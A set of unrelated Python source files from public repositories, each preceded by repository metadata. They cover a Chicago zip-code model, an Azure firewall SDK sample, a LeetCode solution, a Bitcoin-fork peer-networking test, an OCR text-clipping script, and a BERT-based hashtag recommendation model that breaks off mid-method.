a8900822d7304576a7b117aea8738776f84b8cfc | ae7c6bf729fc4527cfbb7b29bd4dee77b01584c4 | /chicago/zip_codes.py | 13725efc7dab3c1d18c9c420fa3d06d984a02a04 | [] | no_license | ghing/python-chicago | 61fd2639160bf1092d7bcfbc1101dc8428764042 | 4fefb221bca83d55e6c6eb7bae4b90149acf7c57 | refs/heads/master | 2021-01-13T04:33:02.289631 | 2017-01-20T22:13:53 | 2017-01-20T22:13:53 | 79,591,829 | 0 | 0 | null | 2017-01-20T19:44:17 | 2017-01-20T19:44:17 | null | UTF-8 | Python | false | false | 998 | py | import os.path
import six
from .base import Model, Collection, DATA_DIRECTORY
ZIP_CODE_GEOJSON_PATH = os.path.join(DATA_DIRECTORY, 'chicago_zip_codes.geojson')
class ZipCode(Model):
fields = [
'zip',
]
def __str__(self):
return self.zip
def __repr__(self):
return "ZipCode(zip='{z.zip}')".format(z=self)
class ZipCodeCollection(Collection):
model = ZipCode
def __init__(self):
self._by_zip = {}
super(ZipCodeCollection, self).__init__()
def add_item(self, item):
super(ZipCodeCollection, self).add_item(item)
self._by_zip[item.zip] = item
def get_by_zip(self, zip_code):
return self._by_zip[six.text_type(zip_code)]
def default_sort(self):
self._items = sorted(self._items, key=lambda p: p.zip)
return self
def is_chicago(self, zip_code):
return six.text_type(zip_code) in self._by_zip
ZIP_CODES = ZipCodeCollection().from_geojson(ZIP_CODE_GEOJSON_PATH)
| [
"[email protected]"
] | |
3192468b3d6d4a4e049545f1a74508b86d451062 | aa0270b351402e421631ebc8b51e528448302fab | /sdk/paloaltonetworks/azure-mgmt-paloaltonetworksngfw/generated_samples/fqdn_list_local_rulestack_create_or_update_maximum_set_gen.py | 755d0412200bb3a98af329c57e98ac8474ced4c4 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 2,048 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.paloaltonetworks import PaloAltoNetworksNgfwMgmtClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-paloaltonetworks
# USAGE
python fqdn_list_local_rulestack_create_or_update_maximum_set_gen.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = PaloAltoNetworksNgfwMgmtClient(
credential=DefaultAzureCredential(),
subscription_id="2bf4a339-294d-4c25-b0b2-ef649e9f5c27",
)
response = client.fqdn_list_local_rulestack.begin_create_or_update(
resource_group_name="rgopenapi",
local_rulestack_name="lrs1",
name="armid1",
resource={
"properties": {
"auditComment": "string",
"description": "string",
"etag": "aaaaaaaaaaaaaaaaaa",
"fqdnList": ["string1", "string2"],
"provisioningState": "Accepted",
}
},
).result()
print(response)
# x-ms-original-file: specification/paloaltonetworks/resource-manager/PaloAltoNetworks.Cloudngfw/preview/2022-08-29-preview/examples/FqdnListLocalRulestack_CreateOrUpdate_MaximumSet_Gen.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
ffc913ac274984b687fba1e23716572ced7bbd7b | fc861233f2ae31f3cdf312e5ca8d68029e811f69 | /arrays/SuperWashingMachine_HARD.py | d07ff21678abb6b5f9300ede6cf7a6089d3f2b78 | [] | no_license | QuentinDuval/PythonExperiments | 20fc54d98ff6e4131975809c32cf8844ff2a8ecb | 3ffcfee5cedf421d5de6d0dec4ba53b0eecbbff8 | refs/heads/master | 2021-07-26T21:24:18.324350 | 2020-05-02T08:11:58 | 2020-05-02T08:11:58 | 163,210,028 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | """
https://leetcode.com/problems/super-washing-machines/
You have n super washing machines on a line. Initially, each washing machine has some dresses or is empty.
For each move, you could choose any m (1 ≤ m ≤ n) washing machines, and pass one dress of each washing machine
to one of its adjacent washing machines at the same time .
Given an integer array representing the number of dresses in each washing machine from left to right on the line,
you should find the minimum number of moves to make all the washing machines have the same number of dresses.
If it is not possible to do it, return -1.
"""
from typing import List
class Solution:
def findMinMoves(self, machines: List[int]) -> int:
"""
Do not care about individual transfers:
* [1, 0, 5] requires 3 moves for 5 to go down to 2 (only thing to care about)
* [0,3,0] requires 2 moves for 3 to go down to 1 (only thing to care about)
* [1,2,2,2,3] requires 1 move (since all can move in same direction)
But there are some subtelties:
* [3,3,0,0,0,0] => 4 because the second number 3 will not be able to decrease at first
* [0,3,3,0,0,0] => 3 because two sides for leaking (so the surplus of 4 will take 3 turns)
* [0,3,0] => 2 because there are two sides, but just 1 element (max capacity of leaking)
* [0,0,3,3,3,0,0,0,0] => 4 because of two sides
Idea is to do a cumulative sum to check how much needs to flow:
[100, 98, 104, 97, 105, 98, 106, 87 , 105, 98, 105, 97, 98, 101, 101]
[0, -2, 4, -3, 5, -2, 6, -13, 5, -2, 5, -3, -2, 1, 1]
[0, -2, 2, -1, 4, 2, 8, -5, 0, -2, 3, 0, -2, -1, 0] cum_sum_left (V)
[0, 0, 2, -2, 1, -4, -2, -8, 5, 0, 2, -3, 0, 2, 1] cum_sum_right (X)
But you should also take into account the maximum value of each node:
[0 ,3, 0] should be 2 cause you need 2 turns to empty one
[-1,2,-1]
[-1,1, 0]
"""
# Create an example
'''
import numpy as np
ex = [100] * 100
for _ in range(500):
i, j = np.random.randint(0,len(ex),size=2)
ex[i] -= 1
ex[j] += 1
print(ex)
'''
# Quick check
total = sum(machines)
N = len(machines)
middle = total // N
if middle * N != total:
return -1
# Maximum contiguous sub-array sum
max_surplus = max(max(m - middle, 0) for m in machines)
cum_surplus = 0
for hi in range(len(machines)):
cum_surplus += (machines[hi] - middle)
max_surplus = max(max_surplus, abs(cum_surplus))
return max_surplus
| [
"[email protected]"
] | |
ffcaeac98202cabcc7de9239e976408589ad2a24 | b7bf93fc21ba8eec04d6f24e79689dd7bb989770 | /test/functional/p2p_node_network_limited.py | 84d7213b4cad926cabd2f4fcbe678d02664e31d6 | [
"MIT"
] | permissive | onuratakan/bitracoin | cd3ab809af1ce9e245b2fecf59e1421e1e427f90 | 1d73e0b6352d29066706ac4033dc7b4711246883 | refs/heads/main | 2023-04-09T03:10:58.075426 | 2021-04-16T22:06:06 | 2021-04-16T22:06:06 | 358,728,118 | 0 | 0 | MIT | 2021-04-16T22:06:07 | 2021-04-16T21:54:02 | null | UTF-8 | Python | false | false | 5,030 | py | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, msg_getdata, msg_verack, NODE_BLOOM, NODE_NETWORK_LIMITED, NODE_WITNESS
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, disconnect_nodes, connect_nodes_bi, sync_blocks, wait_until
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-prune=550', '-addrmantest'], [], []]
def disconnect_all(self):
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[1], 0)
disconnect_nodes(self.nodes[2], 1)
disconnect_nodes(self.nodes[2], 0)
disconnect_nodes(self.nodes[0], 2)
disconnect_nodes(self.nodes[1], 2)
def setup_network(self):
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
expected_services = NODE_BLOOM | NODE_WITNESS | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
connect_nodes_bi(self.nodes, 0, 1)
blocks = self.nodes[1].generatetoaddress(292, self.nodes[1].get_deterministic_priv_key().address)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrieve block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
assert_equal(node1.firstAddrnServices, 1036)
self.nodes[0].disconnect_p2ps()
node1.wait_for_disconnect()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
connect_nodes_bi(self.nodes, 0, 2)
try:
sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
# node2 must remain at height 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
connect_nodes_bi(self.nodes, 1, 2)
# sync must be possible
sync_blocks(self.nodes)
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generatetoaddress(10, self.nodes[0].get_deterministic_priv_key().address)
# connect node1 (non pruned) with node0 (pruned) and check if the can sync
connect_nodes_bi(self.nodes, 0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
| [
"[email protected]"
] | |
84f0f8092f81b651d958dbf77cda36576cc605bd | 605c10db2f950a506af60d57a2074f97ebcf89ab | /code/PROJECT/data_collection/tools/tool_clip_text.py | 8e05a495532ed234d8027f39ebae50d4b03c5f0e | [] | no_license | MulongXie/Research-ReverselyGeneratingWebCode | 928f90d6b4f80ebff40a9a3a48f8b564277a0987 | 2c1598a765166f30786b0e6a22c485358ca2e98d | refs/heads/master | 2020-05-17T18:14:02.241209 | 2020-04-10T00:19:16 | 2020-04-10T00:19:16 | 183,857,077 | 0 | 3 | null | 2020-02-03T04:31:34 | 2019-04-28T04:51:24 | Python | UTF-8 | Python | false | false | 2,437 | py | import pytesseract as pyt
import cv2
import numpy as np
import glob
from os.path import join as pjoin
ROOT_CLEAN_IMG = 'E:\Mulong\Datasets\dataset_webpage\page10000\ip_img_clean'
ROOT_OUTPUT = "E:/Mulong/Datasets/dataset_webpage/elements/text"
def clipping(img, corners, output_root=ROOT_OUTPUT, pad=False, show_clip=False, write_clip=True):
def padding():
height = np.shape(clip)[0]
width = np.shape(clip)[1]
pad_height = int(height / 10)
pad_wid = int(width / 10)
pad_img = np.full(((height + pad_height), (width + pad_wid), 3), 255, dtype=np.uint8)
pad_img[int(pad_height / 2):(int(pad_height / 2) + height), int(pad_wid / 2):(int(pad_wid / 2) + width)] = clip
return pad_img
for i, corner in enumerate(corners):
(top_left, bottom_right) = corner
(col_min, row_min) = top_left
(col_max, row_max) = bottom_right
clip = img[row_min:row_max, col_min:col_max]
if pad:
clip = padding()
if write_clip:
cv2.imwrite(pjoin(output_root, str(i) + '.png'), clip)
if show_clip:
cv2.imshow('clip', clip)
cv2.waitKey(0)
def text_detection(img_clean, show=False):
try:
data = pyt.image_to_data(img_clean).split('\n')
broad = img_clean.copy()
except:
return None
corners_word = []
for d in data[1:]:
d = d.split()
if d[-1] != '-1':
if d[-1] != '-' and d[-1] != '—' and 5 < int(d[-3]) < 40 and 5 < int(d[-4]) < 100:
t_l = (int(d[-6]), int(d[-5]))
b_r = (int(d[-6]) + int(d[-4]), int(d[-5]) + int(d[-3]))
corners_word.append((t_l, b_r))
cv2.rectangle(broad, t_l, b_r, (0, 0, 255), 1)
if show:
cv2.imshow('a', broad)
cv2.waitKey()
return corners_word
def read_img():
img_paths = glob.glob(pjoin(ROOT_CLEAN_IMG, '*.png'))
img_paths.sort(key=lambda x: int(x.split('\\')[-1][:-4]))
start_index = 5647
end_index = 20000
for img_path in img_paths:
index = img_path.split('\\')[-1][:-4]
if int(index) < start_index:
continue
if int(index) > end_index:
break
print(img_path)
img = cv2.imread(img_path)
corners_word = text_detection(img)
if corners_word is not None:
clipping(img, corners_word)
read_img()
| [
"[email protected]"
] | |
bbf636e5ca3a130e3de7564001791c09bed132d0 | d3a204a438d7f2d439b3f18be9cf1271f5ab475f | /project3/my_model_using_bert23.py | dd43fed3a6bf8f332956534b15c48b9f1a5062f3 | [] | no_license | saga9017/laboratory | f2f0d07fb691bd89e6f614cca7e377e82da5f656 | 77c53c36a99c0da17f23df235edacbcf83469b42 | refs/heads/master | 2021-05-16T19:32:23.477377 | 2020-03-27T06:44:16 | 2020-03-27T06:44:16 | 250,438,442 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,191 | py | """""""""""""""""""""""""""
using pre-trained bert, using cls for prediction, fine-tuning, using text + location + knowledge
"""""""""""""""""""""""""""
import sys, os
from datetime import datetime
import numpy as np
import random
import copy
import time
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.parameter import Parameter
import math
from transformers import *
from project3_data.result_calculator import *
import torch.nn.utils as torch_utils
os.environ["CUDA_VISIBLE_DEVICES"] = '1'
print('gpu :', torch.cuda.is_available())
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
import pickle
import tensorflow as tf
from project3_data.config import *
Dropout = 0.1
hidden_dim = 768
MAX_LENGTH = 450
# ★ oversampling
# def train_generate_batch(t_maxlen, l_maxlen, hashtag_size, hashtagCount, hashtagCount_saved, tag_used):
# batch_img = np.zeros((batch_size(), 1, feat_dim(), w(), w()))
# batch_text = np.zeros((batch_size(), t_maxlen))
# batch_loc = np.zeros((batch_size(), l_maxlen))
# batch_y = np.zeros(batch_size())
# truth_hashtag = []
# text_start = []
# epoch_finish = False
# for i in range(batch_size()):
#
# hashtag_choice = random.randrange(0, hashtag_size)
# data_choice = random.randrange(0, len(hashtagCount[hashtag_choice]))
# # print(hashtag_choice, data_choice, "/", len(hashtagCount[hashtag_choice]))
# # while True:
# # hashtag_choice = random.randrange(0, hashtag_size)
# # if tag_used[hashtag_choice] == False:
# # data_choice = random.randrange(0, len(hashtagCount[hashtag_choice]))
# # break
#
# data_index = hashtagCount[hashtag_choice][data_choice]
# batch_img[i] = train_data[0][data_index]
# batch_text[i] = train_data[1][data_index]
# batch_loc[i] = train_data[2][data_index]
# batch_y[i] = hashtag_choice
# truth_hashtag.append(train_data[3][data_index])
#
# allzero = False
# for q, j in enumerate(batch_text[i]):
# if int(j) != 0:
# text_start.append(q)
# allzero = True
# break
# if allzero == False: text_start.append(0)
#
# del hashtagCount[hashtag_choice][data_choice]
# if len(hashtagCount[hashtag_choice]) == 0:
# tag_used[hashtag_choice] = True
# hashtagCount[hashtag_choice] = copy.deepcopy(hashtagCount_saved[hashtag_choice])
# if np.all(tag_used) == True:
# print("다썼다!")
# tag_used = [False for g in range(hashtag_size)]
# epoch_finish = True
# break
#
# return batch_img, batch_text, batch_loc, batch_y, epoch_finish, truth_hashtag, text_start, tag_used, hashtagCount
# ★ shuffle batch
# def generate_batch(which, pnt, y_cnt, t_maxlen, l_maxlen, finish):
# batch_img = np.zeros((batch_size(), 1, feat_dim(), w(), w()))
# batch_text = np.zeros((batch_size(), t_maxlen))
# batch_loc = np.zeros((batch_size(), l_maxlen))
# batch_y = np.zeros(batch_size())
# batch_cnt = 0
# truth_hashtag = []
# shuffle = list(range(batch_size()))
# random.shuffle(shuffle)
# while True:
# text_start = []
# if which == "train":
# hashend = len(train_data[3][pnt])
# datalen = len(train_data[0])
# batch_img[shuffle[batch_cnt]] = train_data[0][pnt]
# batch_text[shuffle[batch_cnt]] = train_data[1][pnt]
# batch_loc[shuffle[batch_cnt]] = train_data[2][pnt]
# batch_y[shuffle[batch_cnt]] = train_data[3][pnt][y_cnt]
# truth_hashtag.append(train_data[3][pnt])
# elif which == "validation":
# hashend = len(val_data[3][pnt])
# datalen = len(val_data[0])
# batch_img[shuffle[batch_cnt]] = val_data[0][pnt]
# batch_text[shuffle[batch_cnt]] = val_data[1][pnt]
# batch_loc[shuffle[batch_cnt]] = val_data[2][pnt]
# batch_y[shuffle[batch_cnt]] = val_data[3][pnt][y_cnt]
# truth_hashtag.append(val_data[3][pnt])
# else:
# hashend = len(test_data[3][pnt])
# datalen = len(test_data[0])
# batch_img[shuffle[batch_cnt]] = test_data[0][pnt]
# batch_text[shuffle[batch_cnt]] = test_data[1][pnt]
# batch_loc[shuffle[batch_cnt]] = test_data[2][pnt]
# batch_y[shuffle[batch_cnt]] = test_data[3][pnt][y_cnt]
# truth_hashtag.append(test_data[3][pnt])
#
# allzero = False
# for i, j in enumerate(batch_text[shuffle[batch_cnt]]):
# if int(j) != 0:
# text_start.append(i)
# allzero = True
# break
# if allzero == False: text_start.append(0)
#
# # print("------------------------------------------")
# # print("input text:")
# # for i in batch_text[batch_cnt]:
# # textnum = int(i)
# # if textnum != 0:
# # print(vocabulary_inv[textnum], end=" ")
# # print("\ninput loc:")
# # for i in batch_loc[batch_cnt]:
# # locnum = int(i)
# # if locnum != 0:
# # print(vocabulary_inv[locnum], end=" ")
# # print("\nTrue hashtag:")
# # for i in truth_hashtag[batch_cnt]:
# # print(hashtagVoc_inv[int(i)], end="||")
# # print()
# y_cnt += 1
# batch_cnt += 1
#
# if y_cnt == hashend:
# y_cnt = 0
# pnt += 1
# if pnt == datalen:
# pnt = 0
# finish = True
#
# if finish or batch_cnt == batch_size(): break
# return batch_img, batch_text, batch_loc, batch_y, pnt, y_cnt, finish, truth_hashtag, text_start
def load_k():
k_train, k_val, k_test = [], [], []
with open("project3_data/txt/e5_train_insta_textonly.txt", "r") as f:
while True:
line = f.readline()
if not line: break
line = line.split()
for i in range(len(line)):
line[i] = int(line[i])
k_train.append(line)
with open("project3_data/txt/e5_val_insta_textonly.txt", "r") as f:
while True:
line = f.readline()
if not line: break
line = line.split()
for i in range(len(line)):
line[i] = int(line[i])
k_val.append(line)
with open("project3_data/txt/e5_test_insta_textonly.txt", "r") as f:
while True:
line = f.readline()
if not line: break
line = line.split()
for i in range(len(line)):
line[i] = int(line[i])
k_test.append(line)
return k_train, k_val, k_test
"""""
def generate_batch(which, pnt, y_cnt, t_maxlen, l_maxlen, finish):
batch_img = np.zeros((batch_size(), 1, feat_dim(), w(), w()))
batch_text = np.zeros((batch_size(), t_maxlen))
batch_loc = np.zeros((batch_size(), l_maxlen))
batch_know = np.zeros((batch_size(), cat_num()))
batch_y = np.zeros(batch_size())
batch_cnt = 0
truth_hashtag = []
while True:
if which == "train":
hashend = len(train_data[3][pnt])
datalen = len(train_data[0])
batch_img[batch_cnt] = train_data[0][pnt]
batch_text[batch_cnt] = train_data[1][pnt]
batch_loc[batch_cnt] = train_data[2][pnt]
batch_y[batch_cnt] = train_data[3][pnt][y_cnt]
truth_hashtag.append(train_data[3][pnt])
batch_know[batch_cnt] = train_data[4][pnt]
elif which == "validation":
hashend = len(val_data[3][pnt])
datalen = len(val_data[0])
batch_img[batch_cnt] = val_data[0][pnt]
batch_text[batch_cnt] = val_data[1][pnt]
batch_loc[batch_cnt] = val_data[2][pnt]
batch_y[batch_cnt] = val_data[3][pnt][y_cnt]
truth_hashtag.append(val_data[3][pnt])
batch_know[batch_cnt] = val_data[4][pnt]
else:
hashend = len(test_data[3][pnt])
datalen = len(test_data[0])
batch_img[batch_cnt] = test_data[0][pnt]
batch_text[batch_cnt] = test_data[1][pnt]
batch_loc[batch_cnt] = test_data[2][pnt]
batch_y[batch_cnt] = test_data[3][pnt][y_cnt]
truth_hashtag.append(test_data[3][pnt])
batch_know[batch_cnt] = test_data[4][pnt]
y_cnt += 1
batch_cnt += 1
if y_cnt == hashend:
y_cnt = 0
pnt += 1
if pnt == datalen:
pnt = 0
finish = True
if finish or batch_cnt == batch_size(): break
return batch_img, batch_text, batch_loc, batch_know, batch_y, pnt, y_cnt, finish, truth_hashtag
"""""
class Norm(nn.Module):
def __init__(self):
super(Norm, self).__init__()
self.gamma=Parameter(torch.tensor(1.0))
self.beta = Parameter(torch.tensor(0.0))
def forward(self, X):
mu = torch.mean(X, dim=2)
var = torch.var(X, dim=2)
X_norm = torch.div(X - mu.view(X.shape[0], X.shape[1], 1), torch.sqrt(var.view(X.shape[0], X.shape[1], 1) + 1e-8))
out = self.gamma * X_norm + self.beta
return out
class Multi_head_attention(nn.Module):
def __init__(self, hidden_dim=300, hidden_dim_=512, dropout=Dropout):
super().__init__()
self.dropout=nn.Dropout(dropout)
self.softmax = nn.Softmax(-1)
self.layerNorm_add_Norm = Norm()
self.w_qs = nn.Linear(hidden_dim, hidden_dim_)
self.w_ks = nn.Linear(hidden_dim, hidden_dim_)
self.w_vs = nn.Linear(hidden_dim, hidden_dim_)
self.w_os = nn.Linear(hidden_dim_, hidden_dim)
nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (hidden_dim)))
nn.init.normal_(self.w_ks.weight, mean=0, std=np.sqrt(2.0 / (hidden_dim)))
nn.init.normal_(self.w_vs.weight, mean=0, std=np.sqrt(2.0 / (hidden_dim)))
nn.init.xavier_normal_(self.w_os.weight)
def forward(self, en, de, mask, dropout=False): # x : (input_len, hidden_dim)
d_k = de.shape[-1]
len_d0, len_d1=de.shape[0], de.shape[1]
len_e0, len_e1=en.shape[0], en.shape[1]
q = self.w_qs(de).view(len_d0, len_d1, -1, 8).permute(3, 0, 1, 2)
k = self.w_ks(en).view(len_e0, len_e1, -1, 8).permute(3, 0, 2, 1)
v = self.w_vs(en).view(len_e0, len_e1, -1, 8).permute(3, 0, 1, 2)
e = torch.matmul(q, k) / math.sqrt(d_k)
masked_e = e.masked_fill(mask, -1e10)
alpha = self.softmax(masked_e) # (output_len, input_len)
if dropout==True:
alpha = self.dropout(alpha)
head3 = torch.matmul(alpha, v)
a = torch.cat((head3[0], head3[1], head3[2], head3[3], head3[4],
head3[5], head3[6], head3[7]), 2)
result = self.w_os(a)
result=self.layerNorm_add_Norm(result+de)
return result # (output_len, hidden)
def gelu(x):
"""Gaussian Error Linear Unit.
This is a smoother version of the RELU.
Original paper: https://arxiv.org/abs/1606.08415
Args:
x: float Tensor to perform activation.
Returns:
`x` with the GELU activation applied.
"""
cdf = 0.5 * (1.0 + torch.tanh(
(np.sqrt(2 / np.pi) * (x + 0.044715 * torch.pow(x, 3)))))
return x * cdf
class FFN(nn.Module): # feed forward network x : (batch_size, input_len, hidden)
def __init__(self, hidden_dim=300, dropout=Dropout):
super().__init__()
self.dropout = nn.Dropout(dropout)
self.layerNorm_add_Norm = Norm()
self.fc1 = nn.Linear(hidden_dim, 4 * hidden_dim)
self.fc2 = nn.Linear(4*hidden_dim, hidden_dim)
nn.init.xavier_normal_(self.fc1.weight)
nn.init.xavier_normal_(self.fc2.weight)
def forward(self, x, dropout=False):
output = self.fc1(x) # (batch_size, input_len, 4*hidden)
if dropout==True:
output = self.dropout(gelu(output)) # (batch_size, input_len, 4*hidden)
else:
output = gelu(output)
output = self.fc2(output) # (batch_size, input_len, hidden
output=self.layerNorm_add_Norm(output+x)
return output
##################################################### Sub layer ########################################################
class Encoder_layer(nn.Module):
def __init__(self, hidden_dim=300, hidden_dim_=512, dropout=Dropout): # default=512
# Assign instance variables
super().__init__()
self.multi_head_self_attention=Multi_head_attention(hidden_dim, hidden_dim_, dropout)
self.ffn=FFN(hidden_dim, dropout)
self.dropout_1 = nn.Dropout(dropout)
self.dropout_2 = nn.Dropout(dropout)
def forward(self, x, mask, non_pad_mask, dropout=False):
if dropout==True:
output=self.dropout_1(self.multi_head_self_attention(x, x, mask, dropout=True))
output=output.masked_fill(non_pad_mask==0, 0)
output=self.dropout_2(self.ffn(output, dropout=True))
output=output.masked_fill(non_pad_mask==0, 0)
else:
output = self.multi_head_self_attention(x, x, mask)
output = output.masked_fill(non_pad_mask == 0, 0)
output = self.ffn(output)
output = output.masked_fill(non_pad_mask == 0, 0)
return output
#################################################### Layer ##############################################################
class Transformer_new(nn.Module):
def __init__(self, hidden_dim=hidden_dim, hidden_dim_=hidden_dim): # default=512
# Assign instance variables
super().__init__()
self.hidden = hidden_dim
self.segment_embed = nn.Embedding(3, hidden_dim)
self.sequence_embed = Parameter(torch.randn(512+(5+1)+(49+1), hidden_dim))
self.know_embed=nn.Embedding(540, hidden_dim)
#weight initialization
self.segment_embed.weight.data.uniform_(-0.01, 0.01)
self.know_embed.weight.data.uniform_(-0.01, 0.01)
nn.init.xavier_normal_(self.sequence_embed)
self.encoder1=Encoder_layer(hidden_dim, hidden_dim_)
self.encoder2 = Encoder_layer(hidden_dim, hidden_dim_)
self.encoder3 = Encoder_layer(hidden_dim, hidden_dim_)
#self.encoder4 = Encoder_layer(hidden_dim, hidden_dim_)
#self.encoder5 = Encoder_layer(hidden_dim, hidden_dim_)
#self.encoder6 = Encoder_layer(hidden_dim, hidden_dim_)
def input_embedding(self, batch_text, batch_know): # x: (batch, input_len, )
b_size, s_len, _=batch_text.shape
mixed=torch.cat([self.know_embed(batch_know), batch_text], dim=1)
segment=torch.tensor([1]*6+[2]*s_len).to(device)
return mixed+self.segment_embed(segment)+self.sequence_embed[:mixed.shape[1]].unsqueeze(0).repeat(b_size, 1, 1) # (input_len, hidden_dim)
def forward(self, batch_text, batch_know, attention_mask, dropout):
b_size, s_len, _=batch_text.shape
x1= self.input_embedding(batch_text, batch_know) # (input_len, hidden)
###################################### make non_pad_mask #####################################################
if device.type=='cpu':
margin=torch.tensor([1] * (x1.shape[1]-s_len)).repeat(b_size, 1).byte().to(device)
else:
margin = torch.tensor([1] * (x1.shape[1] - s_len)).repeat(b_size, 1).bool().to(device)
non_pad_mask = torch.cat([margin, attention_mask], dim=1).unsqueeze(-1).repeat(1, 1, self.hidden).float()
mask_e = (torch.cat([margin, attention_mask], dim=1).unsqueeze(1).repeat(1, x1.shape[1], 1)==0)
################################################################################################################
x1=x1.masked_fill(non_pad_mask==0, 0)
########################################################
x2 = self.encoder1(x1, mask_e, non_pad_mask, dropout=dropout)
x3 = self.encoder2(x2 + x1, mask_e, non_pad_mask, dropout=dropout)
x4 = self.encoder3(x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
#x5 = self.encoder4(x4 + x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
#x6 = self.encoder5(x5 + x4 + x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
#x7 = self.encoder6(x6 + x5 + x4 + x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
return x4
pretrained_weights = 'bert-base-uncased'
tokenizer = BertTokenizer.from_pretrained(pretrained_weights)
bert = BertModel.from_pretrained(pretrained_weights,
output_hidden_states=True,
output_attentions=True, force_download=True)
class Bert(nn.Module):
def __init__(self):
# Assign instance variables
super(Bert, self).__init__()
self.bert = copy.deepcopy(bert)
def forward(self, x, attention_mask, token_type_ids):
outputs= self.bert(x, attention_mask=attention_mask, token_type_ids=token_type_ids)
last_encoder_output = outputs[0]
return last_encoder_output
class NextSentencePrediction(nn.Module):
"""
2-class classification model : is_next, is_not_next
"""
def __init__(self, hidden):
"""
:param hidden: BERT model output size
"""
super().__init__()
self.linear = nn.Linear(hidden, hashtag_size)
nn.init.xavier_normal_(self.linear.weight)
def forward(self, x):
return self.linear(x[:, 0])
class BERTLM_new(nn.Module):
"""
BERT Language Model
Next Sentence Prediction Model + Masked Language Model
"""
def __init__(self, vocab_size):
"""
:param bert: BERT model which should be trained
:param vocab_size: total vocab size for masked_lm
"""
super().__init__()
self.bert = Bert()
self.next_sentence = NextSentencePrediction(768)
self.Loss = 0
self.softmax = nn.Softmax(-1)
self.transformer_new=Transformer_new()
def forward(self, batch_loc_text, batch_img, batch_know, segment, dropout):
attention_mask=(batch_loc_text!=tokenizer.pad_token_id)
x = self.bert(batch_loc_text, attention_mask=attention_mask.float(), token_type_ids=segment)
x=self.transformer_new(x, batch_know, attention_mask, dropout)
return self.next_sentence(x)
def bptt(self, batch_loc_text, batch_img, batch_know, segment, label, dropout): # (batch_size, out_len)
next_sentence = self.forward(batch_loc_text, batch_img, batch_know, segment, dropout)
